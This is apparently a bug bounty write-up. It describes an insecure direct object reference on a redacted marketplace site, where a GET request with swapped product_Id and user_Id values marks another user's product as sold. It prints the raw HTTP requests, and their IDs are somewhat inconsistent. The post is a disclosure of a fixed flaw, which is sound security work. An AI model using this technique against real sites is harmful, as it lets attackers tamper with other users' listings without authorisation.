($$$) IDOR via GET Request which can SOLD all User Products
Hi everyone,
In this article I want to share my findings on a Private Program at Hackerone which is very unique.
Let’s take a minute to take a look at this :)
When I was hunting on a private program on Hackerone, I came across a scope of https://redacted.com/. And that site is a Market site.
Note:
The scope of my program is kept secret with the word “Redacted”
On that site I tried to see first the flow of how the application processes the request. And after I understand, then start to do bug hunting.
And there is something unique here, where the application processes data via GET and not POST.
This is probably normal, and if you are an API tester you might think this is unique.
The findings are requests where when the attacker makes a request to “SOLD” the product.
Here’s a snippet of the request:
GET /product?product_Id=125&user_Id=1338&Access=sold HTTP/2
Host: www.redacted.com
Cookie: *******
User-Agent: *******
Referer: https://www.redacted.com/product?product_id=125
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Let’s describe the request:
- product_Id
Where the request requires a product_Id to identify the request.
2. user_Id
This parameter is needed to identify the rightful owner of the product requested in the request.
3. Access
In this parameter to identify what requests made by the user.
If so, let’s do some testing on this feature :)
First, I definitely made 2 accounts with each different browser, namely as Attacker and Victim
Then create a Product there with those 2 accounts.
Here’s a snippet of the product URL:
a. Attacker
https://www.redacted.com/product?product_Id=125
b. Victim
https://www.redacted.com/product?product_Id=123
Now let’s open an Attacker account, and capture requests when the attacker “SOLD” the attacker’s product.
Here’s the request:
GET /product?product_Id=123&user_Id=1337&Access=sold HTTP/2
Host: www.redacted.com
Cookie: *******
User-Agent: *******
Referer: https://www.redacted.com/product?product_id=125
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Next, replace the valid product_Id & user_Id parameters belonging to Victim
And see it works.
Timeline :
Report : Mar 1th, 2022
Fix : Mar 8th, 2022
Bounty : $$$